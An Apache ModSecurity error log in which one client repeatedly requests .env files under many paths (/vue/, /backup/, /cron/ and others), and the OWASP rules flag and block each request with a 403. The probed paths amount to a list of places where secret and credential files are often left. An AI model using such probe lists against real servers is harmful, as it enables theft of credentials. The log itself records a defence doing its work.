[Mon May 11 18:03:27.314583 2026] [security2:error] [pid 1411055:tid 1411071] [client 54.67.78.1:56802] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "217.113.192.26"] [uri "/403.shtml"] [unique_id "agH9z0WKUxpmnkK7zHyiEwAAAQ4"]
[Mon May 11 18:03:27.709197 2026] [security2:error] [pid 1411055:tid 1411071] [client 54.67.78.1:56802] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /vue/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "217.113.192.26"] [uri "/vue/.env"] [unique_id "agH9z0WKUxpmnkK7zHyiFQAAAQ4"]
[Mon May 11 18:03:27.709414 2026] [security2:error] [pid 1411055:tid 1411071] [client 54.67.78.1:56802] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "217.113.192.26"] [uri "/vue/.env"] [unique_id "agH9z0WKUxpmnkK7zHyiFQAAAQ4"]
[Mon May 11 18:03:27.709727 2026] [security2:error] [pid 1411055:tid 1411071] [client 54.67.78.1:56802] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "217.113.192.26"] [uri "/403.shtml"] [unique_id "agH9z0WKUxpmnkK7zHyiFQAAAQ4"]
[Mon May 11 18:03:27.994588 2026] [security2:error] [pid 1411055:tid 1411071] [client 54.67.78.1:56802] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /angular/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "217.113.192.26"] [uri "/angular/.env"] [unique_id "agH9z0WKUxpmnkK7zHyiFgAAAQ4"]
[Mon May 11 18:03:27.994860 2026] [security2:error] [pid 1411055:tid 1411071] [client 54.67.78.1:56802] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "217.113.192.26"] [uri "/angular/.env"] [unique_id "agH9z0WKUxpmnkK7zHyiFgAAAQ4"]
[Mon May 11 18:03:27.995240 2026] [security2:error] [pid 1411055:tid 1411071] [client 54.67.78.1:56802] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "217.113.192.26"] [uri "/403.shtml"] [unique_id "agH9z0WKUxpmnkK7zHyiFgAAAQ4"]
[Mon May 11 18:03:28.175617 2026] [security2:error] [pid 1411055:tid 1411071] [client 54.67.78.1:56802] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /svelte/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "217.113.192.26"] [uri "/svelte/.env"] [unique_id "agH90EWKUxpmnkK7zHyiFwAAAQ4"]
[Mon May 11 18:03:28.175872 2026] [security2:error] [pid 1411055:tid 1411071] [client 54.67.78.1:56802] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "217.113.192.26"] [uri "/svelte/.env"] [unique_id "agH90EWKUxpmnkK7zHyiFwAAAQ4"]
[Mon May 11 18:03:28.176201 2026] [security2:error] [pid 1411055:tid 1411071] [client 54.67.78.1:56802] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "217.113.192.26"] [uri "/403.shtml"] [unique_id "agH90EWKUxpmnkK7zHyiFwAAAQ4"]
[Mon May 11 18:03:28.384658 2026] [security2:error] [pid 1411055:tid 1411071] [client 54.67.78.1:56802] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /vite/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "217.113.192.26"] [uri "/vite/.env"] [unique_id "agH90EWKUxpmnkK7zHyiGgAAAQ4"]
[Mon May 11 18:03:28.384913 2026] [security2:error] [pid 1411055:tid 1411071] [client 54.67.78.1:56802] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "217.113.192.26"] [uri "/vite/.env"] [unique_id "agH90EWKUxpmnkK7zHyiGgAAAQ4"]
[Mon May 11 18:03:28.385234 2026] [security2:error] [pid 1411055:tid 1411071] [client 54.67.78.1:56802] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "217.113.192.26"] [uri "/403.shtml"] [unique_id "agH90EWKUxpmnkK7zHyiGgAAAQ4"]
[Mon May 11 18:03:28.578022 2026] [security2:error] [pid 1411055:tid 1411071] [client 54.67.78.1:56802] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /backup/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "217.113.192.26"] [uri "/backup/.env"] [unique_id "agH90EWKUxpmnkK7zHyiGwAAAQ4"]
[Mon May 11 18:03:28.578255 2026] [security2:error] [pid 1411055:tid 1411071] [client 54.67.78.1:56802] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "217.113.192.26"] [uri "/backup/.env"] [unique_id "agH90EWKUxpmnkK7zHyiGwAAAQ4"]
[Mon May 11 18:03:28.578564 2026] [security2:error] [pid 1411055:tid 1411071] [client 54.67.78.1:56802] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "217.113.192.26"] [uri "/403.shtml"] [unique_id "agH90EWKUxpmnkK7zHyiGwAAAQ4"]
[Mon May 11 18:03:28.751226 2026] [security2:error] [pid 1411055:tid 1411071] [client 54.67.78.1:56802] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /backups/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "217.113.192.26"] [uri "/backups/.env"] [unique_id "agH90EWKUxpmnkK7zHyiHAAAAQ4"]
[Mon May 11 18:03:28.751510 2026] [security2:error] [pid 1411055:tid 1411071] [client 54.67.78.1:56802] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "217.113.192.26"] [uri "/backups/.env"] [unique_id "agH90EWKUxpmnkK7zHyiHAAAAQ4"]
[Mon May 11 18:03:28.751811 2026] [security2:error] [pid 1411055:tid 1411071] [client 54.67.78.1:56802] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "217.113.192.26"] [uri "/403.shtml"] [unique_id "agH90EWKUxpmnkK7zHyiHAAAAQ4"]
[Mon May 11 18:03:28.956813 2026] [security2:error] [pid 1411055:tid 1411071] [client 54.67.78.1:56802] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /old/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "217.113.192.26"] [uri "/old/.env"] [unique_id "agH90EWKUxpmnkK7zHyiHQAAAQ4"]
[Mon May 11 18:03:28.957055 2026] [security2:error] [pid 1411055:tid 1411071] [client 54.67.78.1:56802] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "217.113.192.26"] [uri "/old/.env"] [unique_id "agH90EWKUxpmnkK7zHyiHQAAAQ4"]
[Mon May 11 18:03:28.957369 2026] [security2:error] [pid 1411055:tid 1411071] [client 54.67.78.1:56802] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "217.113.192.26"] [uri "/403.shtml"] [unique_id "agH90EWKUxpmnkK7zHyiHQAAAQ4"]
[Mon May 11 18:03:29.128214 2026] [security2:error] [pid 1411055:tid 1411071] [client 54.67.78.1:56802] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /tmp/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "217.113.192.26"] [uri "/tmp/.env"] [unique_id "agH90UWKUxpmnkK7zHyiHgAAAQ4"]
[Mon May 11 18:03:29.128442 2026] [security2:error] [pid 1411055:tid 1411071] [client 54.67.78.1:56802] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "217.113.192.26"] [uri "/tmp/.env"] [unique_id "agH90UWKUxpmnkK7zHyiHgAAAQ4"]
[Mon May 11 18:03:29.128745 2026] [security2:error] [pid 1411055:tid 1411071] [client 54.67.78.1:56802] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "217.113.192.26"] [uri "/403.shtml"] [unique_id "agH90UWKUxpmnkK7zHyiHgAAAQ4"]
[Mon May 11 18:03:29.330911 2026] [security2:error] [pid 1411055:tid 1411071] [client 54.67.78.1:56802] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /temp/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "217.113.192.26"] [uri "/temp/.env"] [unique_id "agH90UWKUxpmnkK7zHyiHwAAAQ4"]
[Mon May 11 18:03:29.331139 2026] [security2:error] [pid 1411055:tid 1411071] [client 54.67.78.1:56802] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "217.113.192.26"] [uri "/temp/.env"] [unique_id "agH90UWKUxpmnkK7zHyiHwAAAQ4"]
[Mon May 11 18:03:29.331473 2026] [security2:error] [pid 1411055:tid 1411071] [client 54.67.78.1:56802] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "217.113.192.26"] [uri "/403.shtml"] [unique_id "agH90UWKUxpmnkK7zHyiHwAAAQ4"]
[Mon May 11 18:03:29.566936 2026] [security2:error] [pid 1411055:tid 1411071] [client 54.67.78.1:56802] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /lab/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "217.113.192.26"] [uri "/lab/.env"] [unique_id "agH90UWKUxpmnkK7zHyiIQAAAQ4"]
[Mon May 11 18:03:29.567244 2026] [security2:error] [pid 1411055:tid 1411071] [client 54.67.78.1:56802] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "217.113.192.26"] [uri "/lab/.env"] [unique_id "agH90UWKUxpmnkK7zHyiIQAAAQ4"]
[Mon May 11 18:03:29.567679 2026] [security2:error] [pid 1411055:tid 1411071] [client 54.67.78.1:56802] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "217.113.192.26"] [uri "/403.shtml"] [unique_id "agH90UWKUxpmnkK7zHyiIQAAAQ4"]
[Mon May 11 18:03:29.763476 2026] [security2:error] [pid 1411055:tid 1411071] [client 54.67.78.1:56802] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /cronlab/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "217.113.192.26"] [uri "/cronlab/.env"] [unique_id "agH90UWKUxpmnkK7zHyiIgAAAQ4"]
[Mon May 11 18:03:29.763709 2026] [security2:error] [pid 1411055:tid 1411071] [client 54.67.78.1:56802] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "217.113.192.26"] [uri "/cronlab/.env"] [unique_id "agH90UWKUxpmnkK7zHyiIgAAAQ4"]
[Mon May 11 18:03:29.764067 2026] [security2:error] [pid 1411055:tid 1411071] [client 54.67.78.1:56802] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "217.113.192.26"] [uri "/403.shtml"] [unique_id "agH90UWKUxpmnkK7zHyiIgAAAQ4"]
[Mon May 11 18:03:29.947131 2026] [security2:error] [pid 1411055:tid 1411071] [client 54.67.78.1:56802] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /cron/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "217.113.192.26"] [uri "/cron/.env"] [unique_id "agH90UWKUxpmnkK7zHyiIwAAAQ4"]
[Mon May 11 18:03:29.947442 2026] [security2:error] [pid 1411055:tid 1411071] [client 54.67.78.1:56802] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "217.113.192.26"] [uri "/cron/.env"] [unique_id "agH90UWKUxpmnkK7zHyiIwAAAQ4"]
[Mon May 11 18:03:29.947819 2026] [security2:error] [pid 1411055:tid 1411071] [client 54.67.78.1:56802] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "217.113.192.26"] [uri "/403.shtml"] [unique_id "agH90UWKUxpmnkK7zHyiIwAAAQ4"]
[Mon May 11 18:03:30.162449 2026] [security2:error] [pid 1411055:tid 1411071] [client 54.67.78.1:56802] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /en/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "217.113.192.26"] [uri "/en/.env"] [unique_id "agH90kWKUxpmnkK7zHyiJAAAAQ4"]
[Mon May 11 18:03:30.162664 2026] [security2:error] [pid 1411055:tid 1411071] [client 54.67.78.1:56802] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "217.113.192.26"] [uri "/en/.env"] [unique_id "agH90kWKUxpmnkK7zHyiJAAAAQ4"]
[Mon May 11 18:03:30.162972 2026] [security2:error] [pid 1411055:tid 1411071] [client 54.67.78.1:56802] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "217.113.192.26"] [uri "/403.shtml"] [unique_id "agH90kWKUxpmnkK7zHyiJAAAAQ4"]
